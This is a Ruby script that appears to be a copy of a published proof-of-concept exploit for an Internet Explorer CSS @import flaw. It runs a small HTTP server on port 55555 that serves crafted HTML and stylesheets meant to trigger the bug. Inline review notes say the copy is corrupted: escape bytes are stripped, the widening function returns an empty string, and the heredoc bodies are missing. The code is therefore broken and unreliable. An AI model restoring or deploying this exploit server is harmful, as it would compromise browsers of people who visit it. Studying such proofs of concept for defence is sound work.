#!/usr/bin/env ruby
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)
require 'socket'
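# Write one complete HTTP/1.1 response to +sock+ and echo it to stdout.
#
# @param sock [IO] connected socket (anything that responds to #write)
# @param data [String] response body, sent verbatim after the headers
# @param opts [Hash] :code (default "200"), :message (default "OK"),
#   :type (default "text/html"); merged over the defaults, never mutated
# @return [Boolean] true when the write succeeded, false on an I/O error
def http_send(sock, data, opts={})
  opts = {:code => "200", :message => "OK", :type => "text/html"}.merge(opts)
  # Content-Length counts bytes. The bodies served by this script are binary
  # (BOM-prefixed, widened text), so String#length would undercount them.
  headers = [
    "HTTP/1.1 #{opts[:code]} #{opts[:message]}",
    "Date: Sat, 11 Dec 2010 14:20:23 GMT",
    "Cache-Control: no-cache",
    "Content-Type: #{opts[:type]}",
    "Pragma: no-cache",
    "Content-Length: #{data.bytesize}"
  ]
  # HTTP header lines end in CRLF; a blank line separates headers from body.
  to_send = headers.join("\r\n") + "\r\n\r\n" + data
  puts "[+] Sending:"
  to_send.split("\n").each { |line| puts " #{line}" }
  begin
    sock.write(to_send)
    true
  rescue IOError, SystemCallError
    # A dead peer is the expected failure here; anything else propagates.
    false
  end
end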
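# Wait up to +timeout+ seconds for +sock+ to become readable, then read one
# chunk of at most 1024 bytes into +out_str+ and echo it to stdout.
#
# The serving loop only pattern-matches the request, so a request longer
# than 1024 bytes is deliberately not reassembled here.
#
# @param sock [BasicSocket] connected socket
# @param out_str [String] replaced in place with the bytes received
#   ("" when the peer has closed the connection)
# @param timeout [Numeric] seconds to wait for readability
# @return [Boolean] true when a chunk was read; false on timeout or on an
#   I/O error, in both of which cases +sock+ has been closed
def sock_read(sock, out_str, timeout=5)
  unless Kernel.select([sock], [], [], timeout)
    sock.close
    return false
  end
  out_str.replace(sock.recv(1024))
  puts "[+] Received:"
  out_str.split("\n").each { |line| puts " #{line}" }
  true
rescue IOError, SystemCallError
  # Only socket failures are swallowed. Interrupts and SystemExit (raised by
  # the QUIT path in the serving loop) must propagate, so no `rescue Exception`.
  sock.close unless sock.closed?
  false
end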
# Intended to widen +str+ to two bytes per input byte: the callers prefix the
# result with "xfexff", which in the original source was presumably the
# UTF-16BE byte-order mark (escapes are stripped in this copy).
#
# NOTE(review): in this copy the loop body is a bare `res` with no append,
# so the method returns "" for every input. The append statement appears to
# have been lost in extraction; confirm against the original source before
# relying on this function.
#
# @param str [String] narrow input
# @return [String] as written, always ""
def to_uni(str)
res = ""
str.each_byte do |b|
res
end
res
end
# Names of the two served resources. In this copy the backslash escapes have
# been stripped: "x00sx03s..." was presumably a run of \x00 / \x03 bytes
# interleaved with 's' — confirm against the original source. @css_name is
# used both as the value substituted into the documents and as the request
# path the serving loop matches.
@css_name = "x00sx03sx00sx03sx00sx03sx00sx03s"
@html_name = "test.html"
# A placeholder of half the css name's length. The documents are widened by
# to_uni (two bytes per byte) before substitution, so the widened placeholder
# is replaced by @css_name without changing the document length.
placeholder = "a" * (@css_name.length/2)
# NOTE(review): the heredoc opener (presumably <<HTML) and the whole heredoc
# body are missing in this copy; as written, this assigns the constant HTML.
# The same applies to the CSS and INDEX blocks below.
@html =
HTML
# "xfexff" is presumably the UTF-16BE byte-order mark with its escapes lost.
@html = "xfexff" + to_uni(@html)
@html.gsub!(to_uni(placeholder), @css_name)
# Stylesheet: four @import rules whose URL becomes @css_name after the
# substitution below (heredoc opener lost in this copy, see note above).
@css =
@import url("#{placeholder}");
@import url("#{placeholder}");
@import url("#{placeholder}");
@import url("#{placeholder}");
CSS
@css = "xfexff" + to_uni(@css)
@css.gsub!(to_uni(placeholder), @css_name)
# Landing page served for "index" requests; it references @html_name
# (heredoc opener lost in this copy, see note above).
@index =
#{@html_name}
INDEX
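# Single-threaded HTTP server on TCP port 55555 (all interfaces) that hands
# out the documents built above: @index for "index" requests, @html for
# @html_name, and @css for @css_name or any other path.
#
# A request containing "QUIT" exits the process. That is the only shutdown
# path besides a signal, and it is unauthenticated: anyone who can reach the
# port can stop the server.
TCPServer.open(55555) do |srv|
  loop do
    cli = srv.accept
    req = ""
    begin
      # One connection is served until the peer closes (empty read), a read
      # times out, or a write fails; each iteration handles one request.
      next unless sock_read(cli, req, 5)
      until req.empty?
        if req =~ /GET/
          # Resource names are matched verbatim inside the request, so they
          # must be escaped before interpolation into the regexp.
          if req =~ /GET.*#{Regexp.escape(@html_name)}/
            break unless http_send(cli, @html, :type => "text/html")
          elsif req =~ /GET.*index/
            break unless http_send(cli, @index)
          else
            # The named stylesheet and every unrecognised path get @css.
            break unless http_send(cli, @css, :type => "text/css")
          end
        elsif req =~ /QUIT/
          exit
        end
        req = ""
        break unless sock_read(cli, req, 5)
      end
    ensure
      # Close on every exit path (including break/next and exceptions) so a
      # failed read or write never leaks the client socket.
      cli.close unless cli.closed?
    end
  end
end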